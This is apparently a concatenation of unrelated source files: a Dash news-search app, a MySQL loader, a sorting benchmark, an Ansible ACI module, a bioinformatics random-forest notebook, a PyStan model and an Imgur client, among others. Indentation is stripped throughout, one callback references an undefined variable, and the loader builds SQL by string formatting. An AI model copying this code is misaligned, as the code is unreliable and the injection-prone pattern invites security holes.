date = list(clickData["points"])[0]["x"]
if switch_value:
switch_value = 1
else:
switch_value = 0
site_indicator = clickData["points"][0]['curveNumber']
if site_indicator == 0:
api_url = f"http://pressgraphs.pythonanywhere.com/date/list/"\
f"{API_KEY}/{search_word}/{switch_value}/{date}/{date}/{st1}"
else:
api_url = f"http://pressgraphs.pythonanywhere.com/date/list/"\
f"{API_KEY}/{search_word}/{switch_value}/{date}/{date}/{st2}"
response = requests.get(api_url)
content = response.json()[1]["data"]
df = pd.DataFrame(content)
return update_dt_by_date(df)
else:
return
###################################
# PAGE 5 LAYOUT
###################################
page_5_layout = html.Div([
html.H5("két szó összevetése"),
dbc.Row(dbc.Col(html.Div(
dbc.Input(id="search_input_1",
placeholder="első keresett szó...",
type="text",
value='')), width=3)),
html.Br(),
dbc.Row(dbc.Col(html.Div(
dbc.Input(id="search_input_2",
placeholder="második keresett szó...",
type="text",
value='')), width=3)),
html.Br(),
dbc.Button("Keresés",
outline=True,
color="info",
className="mr-1",
id='submit-button',
n_clicks=0),
dbc.Checklist(options=[{"label": "keresés szavakon belül", "value": 1}],
value=[],
id="switch-input",
switch=True),
dcc.Graph(id='graph_5'),
html.Div(id="table5")])
###################################
# PAGE 5 CHART CALLBACK
###################################
@app.callback(
Output('graph_5','figure'),
[Input('submit-button', 'n_clicks'),
Input('switch-input', 'value')],
[State('search_input_1', 'value'),
State('search_input_2', 'value')])
def update_word_comparison(n_clicks, switch_value, sw_1, sw_2):
"""
"""
if n_clicks or n_submit:
search_word = sw_1.strip()
if switch_value:
switch_value = 1
else:
switch_value = 0
site="all"
today = datetime.today().strftime("%Y-%m-%d")
from_date = (datetime.today() - \
timedelta(days = MAX_REQUEST_DAY)).strftime("%Y-%m-%d")
api_url = f"http://pressgraphs.pythonanywhere.com/date/count/"\
f"{API_KEY}/{sw_1}/{switch_value}/{from_date}/{today}/{site}"
response = requests.get(api_url)
content_1 = response.json()[1]["data"]
df_1 = pd.DataFrame(content_1)
df_1.set_index("date", inplace=True)
api_url = f"http://pressgraphs.pythonanywhere.com/date/count/"\
f"{API_KEY}/{sw_2}/{switch_value}/{from_date}/{today}/{site}"
response = requests.get(api_url)
content_2 = response.json()[1]["data"]
df_2 = pd.DataFrame(content_2)
df_2.set_index("date", inplace=True)
else:
df_1 = pd.DataFrame()
df_2 = pd.DataFrame()
sw_1 = ""
sw_2 = ""
fig = compare_two_search_words(sw_df_1=df_1,
sw_df_2=df_2,
search_word_1=sw_1,
search_word_2=sw_2)
return fig
###################################
# PAGE 5 DATA TABLE CALLBACK
###################################
@app.callback(
Output('table5', 'children'),
[Input('graph_5', 'clickData'),
Input('switch-input', 'value')],
[State('search_input_1', 'value'),
State('search_input_2', 'value')])
def display_clickData_5(clickData, switch_value, sw_1, sw_2):
"""
#TODO
"""
if clickData:
sw_1 = sw_1.strip()
sw_2 = sw_2.strip()
date = list(clickData["points"])[0]["x"]
site="all"
if switch_value:
switch_value = 1
else:
switch_value = 0
sw_indicator = clickData["points"][0]['curveNumber']
if sw_indicator == 0:
api_url = f"http://pressgraphs.pythonanywhere.com/date/list/"\
f"{API_KEY}/{sw_1}/{switch_value}/{date}/{date}/{site}"
else:
api_url = f"http://pressgraphs.pythonanywhere.com/date/list/"\
f"{API_KEY}/{sw_2}/{switch_value}/{date}/{date}/{site}"
response = requests.get(api_url)
content = response.json()[1]["data"]
df = pd.DataFrame(content)
return update_dt_by_date(df)
else:
return
###################################
# CONTACT
###################################
page_6_layout = html.Div([
html.H4("Elérhetőség"),
dcc.Markdown(children=md_txt.contact)])
###################################
# MANUAL
###################################
page_7_layout = html.Div([
html.H4("Használati útmutató"),
dcc.Markdown(children=md_txt.manual)])
###################################
# SITE LIST
###################################
page_8_layout = html.Div([
html.H4("Monitorozott oldalak listája"),
dcc.Markdown(children=md_txt.modus_operandi)])
###################################
# RUN APP SERVER
###################################
if __name__ == '__main__':
app.run_server(debug=True, port=8050)
#app.run_server()
| 28,956 | 9,663 |
import pickle as pk
import pymysql as mysql
from tqdm import tqdm
host, login, password, db, file_name = input('Enter host, login, password, database name and file name:\n').split()
with open(file_name, 'rb') as f:
data = pk.load(f)
connection = mysql.connect(host, login, password, db)
with connection.cursor() as cur:
# Line below for some reasons do not work, but u have to use same SQL-query in MySQL/MariaDB cmd and it works
#cur.execute('DROP TABLE games_tags;CREATE TABLE games_tags(appid INTEGER NOT NULL UNIQUE, tags VARCHAR(1024) NOT NULL) ENGINE InnoDB;')
for key in tqdm(data.keys()):
string = "'"+', '.join(data[key]).replace('\'', '')+"'"
cur.execute('INSERT INTO games_tags VALUES ({}, {});'.format(key, string))
connection.commit()
connection.close()
| 802 | 259 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Date : Jul-13-19 18:02
# @Author : Your Name (you@example.org)
# @Link : http://example.org
import os
import random
import pysnooper
import time
import csv
from quicksort import quicksort
def bubblesort(l: list):
for i in range(len(l)):
for j in range(i, len(l)):
if l[i] > l[j]:
l[i], l[j] = l[j], l[i]
return l
def main():
"""
bubblesort的时间复杂度是O(n^2)
quicksort的时间复杂度是O(nlogn)
"""
# csv_path = "./bubblesort.csv"
csv_path = "./quicksort.csv"
nsample = 1
N = list(range(10, 10000, 10))
avg_elapsed = 0
for n in N:
for _ in range(nsample):
l = [random.randint(0, 10000) for _ in range(n)]
start = time.clock()
# bubblesort(l)
quicksort(l)
elapsed = (time.clock() - start)
# print("Time used:", elapsed)
avg_elapsed += elapsed
avg_elapsed /= nsample
print("n:", n)
print("Average time used:", avg_elapsed)
if not os.path.exists(csv_path):
f = open(csv_path, "w")
f_csv = csv.writer(f)
f_csv.writerow(["N", "avg_elapsed"])
f_csv.writerow((n, avg_elapsed))
else:
f = open(csv_path, "a")
f_csv = csv.writer(f)
f_csv.writerow((n, avg_elapsed))
avg_elapsed = 0
if __name__ == "__main__":
main()
| 1,467 | 576 |
class SessionBase(object):
"""
Base class for accessing plan, state, and context data.
Is responsible for defining initial state, context, and action in __init__.
ALL METHODS MUST BE OVERRIDDEN.
"""
@property
def plan(self):
"""The active plan for the session"""
raise NotImplementedError("must be overriden")
@property
def configuration(self):
"""The active configuration provider for the session"""
raise NotImplementedError("must be overriden")
@property
def current_node(self):
"""
Gets the current node in the plan that the agent is at
:return: The current node in the plan
"""
raise NotImplementedError("must be overriden")
@property
def current_state(self):
"""
Gets currently processed state
:return: The processed state
"""
raise NotImplementedError("must be overriden")
@property
def current_action(self):
"""
Gets next action to be executed
:return: The action
"""
raise NotImplementedError("must be overriden")
def update_by(self, progress):
"""
Updates session to state and context described by the give progress.
Action for given state is created. (Available through current_action property)
:param progress: State to be set
"""
raise NotImplementedError("must be overriden")
def get_context_copy(self):
"""
Gets copy of currently processed context.
:return: The processed context copy
"""
raise NotImplementedError("must be overriden")
| 1,667 | 422 |
'''
Description:
Author: Kotori Y
Date: 2021-04-22 09:14:19
LastEditors: Kotori Y
LastEditTime: 2021-04-22 09:14:20
FilePath: \LeetCode-Code\codes\Others\Longest-Palindromic-Substring\script.py
AuthorMail: kotori@cbdd.me
'''
class Solution:
def boo(self, s, left, right):
if (left < 0) or (right >= len(s)) or (s[left] != s[right]):
return [left+1, right-1]
return self.boo(s, left-1, right+1)
def longestPalindrome(self, s: str) -> str:
n = len(s)
start, end = 0, 0
for i in range(n):
leftOdd, rightOdd = self.boo(s, i, i)
leftEven, rightEven = self.boo(s, i, i+1)
if rightOdd - leftOdd > end - start:
start, end = leftOdd, rightOdd
if rightEven - leftEven > end - start:
start, end = leftEven, rightEven
return s[start: end+1] | 890 | 350 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: aci_fabric_spine_switch_assoc
short_description: Manage spine switch bindings to profiles and policy groups (fabric:SpineS and fabric:RsSpNodePGrp).
description:
- Manage fabric spine switch associations (fabric:SpineS) to an existing fabric
spine profile (fabric:SpineP) in an ACI fabric, and bind them to a
policy group (fabric:RsSpNodePGrp)
options:
profile:
description:
- Name of an existing fabric spine switch profile
type: str
aliases: [ spine_profile, spine_switch_profile ]
name:
description:
- Name of the switch association
type: str
aliases: [ association_name, switch_association ]
policy_group:
description:
- Name of an existing spine switch policy group
type: str
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
type: str
choices: [ absent, present, query ]
default: present
extends_documentation_fragment:
- cisco.aci.aci
notes:
- The C(profile) must exist before using this module in your playbook.
The M(cisco.aci.aci_fabric_spine_profile) module can be used for this.
seealso:
- name: APIC Management Information Model reference
description: More information about the internal APIC classes B(fabricSpineS) and B(fabricRsSpNodePGrp).
link: https://developer.cisco.com/docs/apic-mim-ref/
author:
- Tim Cragg (@timcragg)
'''
EXAMPLES = r'''
- name: Create a spine switch profile association
cisco.aci.aci_fabric_spine_switch_assoc:
host: apic
username: admin
password: SomeSecretPassword
profile: my_spine_profile
name: my_spine_switch_assoc
policy_group: my_spine_pol_grp
state: present
delegate_to: localhost
- name: Remove a spine switch profile association
cisco.aci.aci_fabric_spine_switch_assoc:
host: apic
username: admin
password: SomeSecretPassword
profile: my_spine_profile
name: my_spine_switch_assoc
state: absent
delegate_to: localhost
- name: Query a spine profile association
cisco.aci.aci_fabric_spine_switch_assoc:
host: apic
username: admin
password: SomeSecretPassword
profile: my_spine_profile
name: my_spine_switch_assoc
state: query
delegate_to: localhost
register: query_result
- name: Query all spine profiles
cisco.aci.aci_fabric_spine_switch_assoc:
host: apic
username: admin
password: SomeSecretPassword
state: query
delegate_to: localhost
register: query_result
'''
RETURN = r'''
current:
description: The existing configuration from the APIC after the module has finished
returned: success
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
error:
description: The error information as returned from the APIC
returned: failure
type: dict
sample:
{
"code": "122",
"text": "unknown managed object class foo"
}
raw:
description: The raw output returned by the APIC REST API (xml or json)
returned: parse error
type: str
sample: '<?xml version="1.0" encoding="UTF-8"?><imdata totalCount="1"><error code="122" text="unknown managed object class foo"/></imdata>'
sent:
description: The actual/minimal configuration pushed to the APIC
returned: info
type: list
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment"
}
}
}
previous:
description: The original configuration from the APIC before the module has started
returned: info
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
proposed:
description: The assembled configuration from the user-provided parameters
returned: info
type: dict
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"name": "production"
}
}
}
filter_string:
description: The filter string used for the request
returned: failure or debug
type: str
sample: ?rsp-prop-include=config-only
method:
description: The HTTP method used for the request to the APIC
returned: failure or debug
type: str
sample: POST
response:
description: The HTTP response from the APIC
returned: failure or debug
type: str
sample: OK (30 bytes)
status:
description: The HTTP status from the APIC
returned: failure or debug
type: int
sample: 200
url:
description: The HTTP url used for the request to the APIC
returned: failure or debug
type: str
sample: https://10.11.12.13/api/mo/uni/tn-production.json
'''
from ansible_collections.cisco.aci.plugins.module_utils.aci import ACIModule, aci_argument_spec
from ansible.module_utils.basic import AnsibleModule
def main():
argument_spec = aci_argument_spec()
argument_spec.update(
profile=dict(type='str', aliases=['spine_profile',
'spine_switch_profile']),
name=dict(type='str', aliases=['association_name',
'switch_association']),
policy_group=dict(type='str'),
state=dict(type='str', default='present',
choices=['absent', 'present', 'query'])
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
required_if=[
['state', 'absent', ['profile', 'name']],
['state', 'present', ['profile', 'name']],
]
)
aci = ACIModule(module)
profile = module.params.get('profile')
name = module.params.get('name')
policy_group = module.params.get('policy_group')
state = module.params.get('state')
child_classes = ['fabricRsSpNodePGrp', 'fabricNodeBlk']
aci.construct_url(
root_class=dict(
aci_class='fabricSpineP',
aci_rn='fabric/spprof-{0}'.format(profile),
module_object=profile,
target_filter={'name': profile},
),
subclass_1=dict(
aci_class='fabricSpineS',
aci_rn='spines-{0}-typ-range'.format(name),
module_object=name,
target_filter={'name': name},
),
child_classes=child_classes,
)
aci.get_existing()
if state == 'present':
child_configs = []
if policy_group:
tDn = 'uni/fabric/funcprof/spnodepgrp-{0}'.format(policy_group)
child_configs.append(
dict(
fabricRsSpNodePGrp=dict(
attributes=dict(
tDn=tDn
)
)
)
)
aci.payload(
aci_class='fabricSpineS',
class_config=dict(
name=name
),
child_configs=child_configs,
)
aci.get_diff(aci_class='fabricSpineS')
aci.post_config()
elif state == 'absent':
aci.delete_config()
aci.exit_json()
if __name__ == "__main__":
main()
| 8,044 | 2,424 |
scriptdir="$HOME/workspace/EM"
DATA="$HOME/oxdata"
datadir="$DATA/P01/EM/M3/M3_S1_GNU" && cd $datadir
dataset='m000'
paraview --state=$datadir/m000_01000-01500_01000-01500_00200-00300/stack+mesh_compact.pvsm
qsubfile=$datadir/EM_con2.sh
echo '#!/bin/bash' > $qsubfile
echo "#SBATCH --nodes=1" >> $qsubfile
echo "#SBATCH --ntasks-per-node=1" >> $qsubfile
echo "#SBATCH --time=01:00:00" >> $qsubfile
echo "#SBATCH --job-name=EM_con" >> $qsubfile
echo "python $scriptdir/convert/EM_stack2stack.py \
${datadir}/m000.h5 ${datadir}/m000.h5 \
-i 'zyx' -l 'xyz' -e -0.0073 -0.0073 0.05 -u" >> $qsubfile
sbatch $qsubfile
scriptdir="$HOME/workspace/EM"
DATA="$HOME/oxdata"
datadir="$DATA/P01/EM/M3/M3_S1_GNU" && cd $datadir
dataset='m000'
pf=''
xs=1000; ys=1000;
z=30; Z=460;
for x in 2000 3000; do
for y in 2000 3000; do
X=$((x+xs))
Y=$((y+ys))
datastem=${dataset}_`printf %05d ${x}`-`printf %05d ${X}`_`printf %05d ${y}`-`printf %05d ${Y}`_`printf %05d ${z}`-`printf %05d ${Z}`
python $scriptdir/convert/EM_stack2stack.py \
${datadir}/${datastem}${pf}.h5 ${datadir}/${datastem}${pf}.nii.gz \
-i 'zyx' -l 'xyz' -e -0.0073 -0.0073 0.05 -u
gunzip ${datadir}/${datastem}${pf}.nii.gz
done
done
| 1,185 | 636 |
#!/usr/bin/env python
# coding: utf-8
# In[5]:
import pandas as pd
import numpy as np
import glob,os
from glob import iglob
#import scanpy as sc
from sklearn.svm import SVC
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import RocCurveDisplay
from sklearn.datasets import load_wine
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.model_selection import StratifiedShuffleSplit
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import roc_auc_score
from sklearn.metrics import accuracy_score
import matplotlib.pyplot as plt
import matplotlib as mpl
from sklearn import metrics
from sklearn.model_selection import KFold
from sklearn.model_selection import StratifiedKFold
import joblib
import time
import random
import matplotlib as mpl
mpl.rcParams['pdf.fonttype']=42
mpl.rcParams['ps.fonttype']=42
# # RA PBMC data for machine learning
# In[6]:
### training data import
ra=pd.read_csv('../RNA_seq_for_autoimmune_disease/RA_bulk/GSE90081/GSE90081_ra_part.csv',index_col=0)
hd=pd.read_csv('../RNA_seq_for_autoimmune_disease/RA_bulk/GSE90081/GSE90081_hd_part.csv',index_col=0)
hd1=pd.read_csv('../RNA_seq_for_autoimmune_disease/health_bulk/GSE183204_HC_fpkm.csv',sep=',',index_col=0)
# In[7]:
### feature import
features=pd.read_csv('../script4paper2/combined_gene_for_machine_learning.csv',index_col=1).index.values
features=np.append(features,'patient')
features=[i for i in features if i in ra.index.values]
features=[i for i in features if i in hd1.index.values ]
# # remove unwanted gene
# In[8]:
### remove unwanted gene from validation data
hd1=hd1.loc[features,:].T
ra_part=ra.loc[features,:].T
hd_part=hd.loc[features,:].T
# # label data
# In[9]:
### label training data
ra_part['patient']=1
hd_part['patient']=0
hd1['patient']=0
# # machine learning data training
# In[39]:
### merge training data
df=pd.concat([ra_part,hd_part,hd1],axis=0)
### get data labels
label=df.patient.values
### split data with ratio 30% for test and 70% for training
Xtrain, Xtest, Ytrain, Ytest = train_test_split(df.drop(columns=['patient']),label,test_size=0.3)
### rf model initialization
rfc = RandomForestClassifier(random_state=43,class_weight='balanced',oob_score=True)
rfc = rfc.fit(Xtrain,Ytrain)
### document model score
score_r = rfc.score(Xtest,Ytest)
### save feature importance
ra_pbmc=pd.DataFrame(rfc.feature_importances_)
ra_pbmc['feature_importance']=features
ra_pbmc.to_csv('./model/ra_pbmc_feature_importance_bulk.csv')
### print F score and Out of bag score
print("Random Forest:{}".format(score_r))
print("OOB score:",rfc.oob_score_)
# # Figure 7A
# In[40]:
### Generating ROC curve
fig = plt.figure(figsize=(8, 8))
ax = plt.gca()
rfc_disp = RocCurveDisplay.from_estimator(rfc, Xtest, Ytest, ax=ax, alpha=0.8)
plt.legend(loc=4,prop={'size': 10})
plt.xlabel('False Positive Rate', fontsize=18)
plt.ylabel('True Positive Rate', fontsize=16)
ax.plot([0, 1], [0, 1], ls="--", c=".3")
mpl.rcParams['pdf.fonttype']=42
mpl.rcParams['ps.fonttype']=42
plt.savefig('./figure6_and_7/7a_ra_pbmc_bulk_auc.pdf',width=4,height=5)
# # save/load best performance model
# In[24]:
### save the best performance model
#joblib.dump(rfc, './model/ra_synovial_bulk_best.model')
### load model
#rfc=joblib.load('./model/sle_best.model')
# In[19]:
### 10-fold cross validation
print(cross_val_score(rfc,df.drop(columns=['patient']),label,cv=10).mean())
print(cross_val_score(rfc,df.drop(columns=['patient']),label,cv=10).var())
# # Figure 7D
# In[42]:
ra_feature=pd.read_csv('./model/ra_pbmc_feature_importance_bulk.csv')
fig, ax = plt.subplots(figsize=(15, 5))
ax.bar(x=ra_feature['feature_importance'], height=ra_feature['0'])
ax.set_title("Feature importance for RA bulk RNA PBMC model", fontsize=15)
plt.xticks(rotation = 90)
mpl.rcParams['pdf.fonttype']=42
mpl.rcParams['ps.fonttype']=42
plt.savefig('./figure6_and_7/7d_ra_pbmc_bulk.pdf',width=15,height=5)
# # Hyper-parameter adjust
# In[795]:
data=df.drop(columns=['patient'])
label=df.patient.values
start=time.time()
scorel = []
for i in range(0,200,10): # loop for 0-200 decision trees
rfc = RandomForestClassifier(n_estimators=i+1,n_jobs=-1,random_state=0)
score = cross_val_score(rfc,data,label,cv=10).mean()
scorel.append(score)
print(max(scorel),(scorel.index(max(scorel))*10)+1)
end=time.time()
print('Running time: %s Seconds'%(end-start))
plt.figure(figsize=[20,5])
plt.plot(range(1,201,10),scorel)
plt.show()
# In[801]:
scorel = []
for i in range(185,205):
rfc = RandomForestClassifier(n_estimators=i+1,n_jobs=-1,random_state=0)
score = cross_val_score(rfc,data,label,cv=10).mean()
scorel.append(score)
print(max(scorel),([*range(185,205)][scorel.index(max(scorel))]))
plt.figure(figsize=[20,5])
plt.plot(range(185,205),scorel)
plt.show()
# In[802]:
start=time.time()
param_grid = {'max_depth':np.arange(1, 90,2)}
alg = RandomForestClassifier(n_estimators=190,random_state=0)
GS = GridSearchCV(alg,param_grid,cv=10)
GS.fit(data,label)
print(GS.best_params_)
print(GS.best_score_)
end=time.time()
print('Running time: %s Seconds'%(end-start))
# In[803]:
start=time.time()
param_grid = {'max_features':np.arange(5,80,1)}
rfc = RandomForestClassifier(n_estimators=190,random_state=0)
GS = GridSearchCV(rfc,param_grid,cv=10)
GS.fit(data,label)
print(GS.best_params_)
print(GS.best_score_)
end=time.time()
print('Running time: %s Seconds'%(end-start))
# # 100 loop of 10-fold cross validation
# In[35]:
df_n=df.drop(columns=['patient'])
rfc_l = []
fpr_l=[]
tpr_l=[]
acc_l=[]
skf =StratifiedKFold(n_splits=10)
for i in range(100):
for train_index, test_index in skf.split(df_n,label):
rfc = RandomForestClassifier(random_state=0,class_weight="balanced",oob_score=True)
rfc = rfc.fit(df_n.iloc[train_index],label[train_index])
rfc_l.append(roc_auc_score(label[test_index], rfc.predict_proba(df_n.iloc[test_index])[:, 1]))
acc_l.append(accuracy_score(label[test_index], rfc.predict(df_n.iloc[test_index])))
# In[36]:
### average AUC and its standard deviation error
print(np.mean(rfc_l))
print(np.std(rfc_l))
| 6,319 | 2,644 |
import json
import pytest
from approvaltests import verify
from approvaltests.utils import get_adjacent_file
from statement import statement
def test_example_statement():
with open(get_adjacent_file("invoice.json")) as f:
invoice = json.loads(f.read())
with open(get_adjacent_file("plays.json")) as f:
plays = json.loads(f.read())
verify(statement(invoice, plays))
def test_statement_with_new_play_types():
with open(get_adjacent_file("invoice_new_plays.json")) as f:
invoice = json.loads(f.read())
with open(get_adjacent_file("new_plays.json")) as f:
plays = json.loads(f.read())
with pytest.raises(ValueError) as exception_info:
statement(invoice, plays)
assert "unknown type" in str(exception_info.value)
| 782 | 249 |
def require(arg_name, *allowed_types):
def make_wrapper(f):
if hasattr(f, "wrapped_args"):
wrapped_args = getattr(f, "wrapped_args")
else:
code = f.func_code
wrapped_args = list(code.co_varnames[:code.co_argcount])
try:
arg_index = wrapped_args.index(arg_name)
except ValueError:
raise NameError, arg_name
def wrapper(*args, **kwargs):
if len(args) > arg_index:
arg = args[arg_index]
if not isinstance(arg, allowed_types):
type_list = " or ".join(str(allowed_type) for allowed_type in allowed_types)
raise TypeError, "Expected '%s' to be %s; was %s." % (arg_name, type_list, type(arg))
else:
if arg_name in kwargs:
arg = kwargs[arg_name]
if not isinstance(arg, allowed_types):
type_list = " or ".join(str(allowed_type) for allowed_type in allowed_types)
raise TypeError, "Expected '%s' to be %s; was %s." % (arg_name, type_list, type(arg))
return f(*args, **kwargs)
wrapper.wrapped_args = wrapped_args
return wrapper
return make_wrapper
@require("x", int, float)
@require("y", float)
def foo(x, y):
return x+y
print foo(1, 2.5) # Prints 3.5.
print foo(2.0, 2.5) # Prints 4.5.
print foo("asdf", 2.5) # Raises TypeError exception.
print foo(1, 2) # Raises TypeError exception.
| 1,537 | 486 |
# AUTOGENERATED! DO NOT EDIT! File to edit: ai_platform_constants.ipynb (unless otherwise specified).
__all__ = ['AcceleratorType', 'ScaleTier', 'MachineType', 'DistributionStrategyType']
# Cell
from enum import Enum
# https://cloud.google.com/sdk/gcloud/reference/ai-platform/jobs/submit/training#--master-accelerator
class AcceleratorType(Enum):
NVIDIA_TESLA_K80 = 'nvidia-tesla-k80'
NVIDIA_TESLA_P100 = 'nvidia-tesla-p100'
NVIDIA_TESLA_V100 = 'nvidia-tesla-v100'
NVIDIA_TESLA_P4 = 'nvidia-tesla-p4'
NVIDIA_TESLA_T4 = 'nvidia-tesla-t4'
TPU_V2 = 'tpu-v2'
TPU_V2_POD = 'tpu-v2-pod'
TPU_V3 = 'tpu-v3'
TPU_V3_POD = 'tpu-v3-pod'
# Cell
# https://cloud.google.com/sdk/gcloud/reference/ai-platform/jobs/submit/training#--master-machine-type
class ScaleTier(Enum):
"""Single worker instance.
This tier is suitable for learning how to use AI Platform, and for experimenting
with new models using small datasets."""
BASIC = 'basic'
"""Single worker instance with a GPU."""
BASIC_GPU = 'basic-gpu'
"""Single worker instance with a Cloud TPU."""
BASIC_TPU = 'basic-tpu'
"""The CUSTOM tier is not a set tier, but rather enables you to use your
own cluster specification. When you use this tier, set values to
configure your processing cluster according to these guidelines"""
CUSTOM = 'custom'
"""Many workers and a few parameter servers."""
STANDARD_1 = 'standard-1';
"""A large number of workers with many parameter servers."""
PREMIUM_1 = 'premium-1'
# Cell
# https://cloud.google.com/compute/docs/machine-types
class MachineType(Enum):
N1_STANDARD_4 = 'n1-standard-4'
N1_STANDARD_8 = 'n1-standard-8'
N1_STANDARD_16 = 'n1-standard-16'
N1_STANDARD_32 = 'n1-standard-32'
N1_STANDARD_64 = 'n1-standard-64'
N1_STANDARD_96 = 'n1-standard-96'
N1_HIGHMEM_2 = 'n1-highmem-2'
N1_HIGHMEM_4 = 'n1-highmem-4'
N1_HIGHMEM_8 = 'n1-highmem-8'
N1_HIGHMEM_16 = 'n1-highmem-16'
N1_HIGHMEM_32 = 'n1-highmem-32'
N1_HIGHMEM_64 = 'n1-highmem-64'
N1_HIGHMEM_96 = 'n1-highmem-96'
N1_HIGHCPU_16 = 'n1-highcpu-16'
N1_HIGHCPU_32 = 'n1-highcpu-32'
N1_HIGHCPU_64 = 'n1-highcpu-64'
N1_HIGHCPU_96 = 'n1-highcpu-96'
# Cell
class DistributionStrategyType(Enum):
def __str__(self):
return str(self.value)
MIRRORED_STRATEGY = "tf.distribute.MirroredStrategy"
ONE_DEVICE_STRATEGY = "tf.distribute.OneDeviceStrategy"
CENTRAL_STORAGE_STRATEGY = "tf.distribute.experimental.CentralStorageStrategy"
PARAMETER_SERVERSTRATEGY = "tf.distribute.experimental.ParameterServerStrategy"
MULTI_WORKER_MIRRORED_STRATEGY = "tf.distribute.experimental.MultiWorkerMirroredStrategy"
TPU_STRATEGY = "tf.distribute.experimental.TPUStrategy"
| 2,914 | 1,201 |
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
# Install using pip install pystan
# It requires a C/C++ compiler
import pystan
# Set random seed for reproducibility
np.random.seed(1000)
# Number of observations
nb_samples = 10
if __name__ == "__main__":
# Create the observations
departure_delay = np.random.exponential(0.5, size=nb_samples)
travel_time = np.random.normal(2.0, 0.2, size=nb_samples)
arrival_delay = np.random.exponential(0.1, size=nb_samples)
arrival_time = np.random.normal(departure_delay +
travel_time +
arrival_delay,
0.5, size=nb_samples)
# Define the Stan model
code = """
data {
int<lower=0> num;
vector[num] departure_delay;
vector[num] travel_time;
vector[num] arrival_delay;
vector[num] arrival_time;
}
parameters {
real beta_a;
real beta_b;
real mu_t;
real sigma_t;
real sigma_a;
}
model {
departure_delay ~ exponential(beta_a);
travel_time ~ normal(mu_t, sigma_t);
arrival_delay ~ exponential(beta_b);
arrival_time ~ normal(departure_delay +
travel_time +
arrival_delay,
sigma_a);
}
"""
# Compile the model
model = pystan.StanModel(model_code=code)
# Define the observation dataset
data = {
"num": nb_samples,
"departure_delay": departure_delay,
"arrival_time": arrival_time,
"travel_time": travel_time,
"arrival_delay": arrival_delay
}
# Fit the model
fit = model.sampling(data=data, iter=10000,
refresh=10000, warmup=1000,
chains=2, seed=1000)
# Show a fit summary
print(fit)
# Sample some parameters from the posterior distribution
ext = fit.extract()
beta_a = ext["beta_a"]
beta_b = ext["beta_b"]
mu_t = ext["mu_t"]
sigma_t = ext["sigma_t"]
# Show the density estimations
sns.set()
fig, ax = plt.subplots(2, 2, figsize=(22, 12))
sns.distplot(beta_a, kde_kws={"shade": True}, ax=ax[0, 0])
sns.distplot(beta_b, kde_kws={"shade": True}, ax=ax[0, 1])
sns.distplot(mu_t, kde_kws={"shade": True}, ax=ax[1, 0])
sns.distplot(sigma_t, kde_kws={"shade": True}, ax=ax[1, 1])
ax[0, 0].set_title(r"$\beta_0$", fontsize=22)
ax[0, 1].set_title(r"$\beta_1$", fontsize=22)
ax[1, 0].set_title(r"$\mu_t$", fontsize=22)
ax[1, 1].set_title(r"$\sigma_t$", fontsize=22)
plt.show()
| 2,702 | 965 |
import json
import logging
from datetime import datetime
import requests
from api.imgur import *
from exceptions.pymage_exceptions import NotAbleToDownloadException, ImgurAPICommunicationException
from utils.utils import extract_imgur_id_from_url
LOGGER = logging.getLogger(__name__)
class ImgurAPI:
@staticmethod
def get_image_urls(url: str) -> list:
imgur_id = extract_imgur_id_from_url(url)
try:
if "/gallery/" in url:
image_urls = ImgurAPI._get_gallery_urls(imgur_id)
elif "/a/" in url:
image_urls = ImgurAPI._get_album_urls(imgur_id)
else:
# This is a URL with no gallery, album or extension
image_urls = ImgurAPI._get_simple_imgur_url(imgur_id)
except ImgurAPICommunicationException:
raise NotAbleToDownloadException(f"Couldn't process: {url}")
return image_urls
@staticmethod
def _get_simple_imgur_url(imgur_id: str) -> list:
imgur_endpoint = ImgurAPI._get_endpoint_url(IMGUR_SIMPLE, imgur_id)
response = ImgurAPI.get(imgur_endpoint)
if not response.get("success"):
raise ImgurAPICommunicationException(f"Unsuccessful query to Imgur API for ID: {imgur_id}")
link = response.get("data").get("link")
return [link]
@staticmethod
def _get_album_urls(imgur_id: str) -> list:
imgur_endpoint = ImgurAPI._get_endpoint_url(IMGUR_ALBUM, imgur_id)
response = ImgurAPI.get(imgur_endpoint)
if not response.get("success"):
raise ImgurAPICommunicationException(f"Unsuccessful query to Imgur API for ID: {imgur_id}")
album_urls = [image_data.get("link") for image_data in response.get("data")]
return album_urls
@staticmethod
def _get_gallery_urls(imgur_id: str) -> list:
imgur_endpoint = ImgurAPI._get_endpoint_url(IMGUR_GALLERY, imgur_id)
response = ImgurAPI.get(imgur_endpoint)
if not response.get("success"):
raise ImgurAPICommunicationException(f"Unsuccessful query to Imgur API for ID: {imgur_id}")
gallery_urls = [image_data.get("link") for image_data in response.get("data").get("images")]
return gallery_urls
@staticmethod
def _get_endpoint_url(endpoint: str, imgur_id: str) -> str:
return IMGUR_ENDPOINTS.get(endpoint).replace(IMGUR_ID_URL_PLACEHOLDER, imgur_id)
@staticmethod
def _update_api_limits(response: requests.models.Response):
reported_user_limit = int(response.headers[IMGUR_API_RESPONSE_HEADER_USER_LIMIT])
reported_user_remaining = int(response.headers[IMGUR_API_RESPONSE_HEADER_USER_REMAINING])
reported_user_reset_ts = int(response.headers[IMGUR_API_RESPONSE_HEADER_USER_RESET])
LOGGER.debug(f"Imgur API Remaining calls: {reported_user_remaining}")
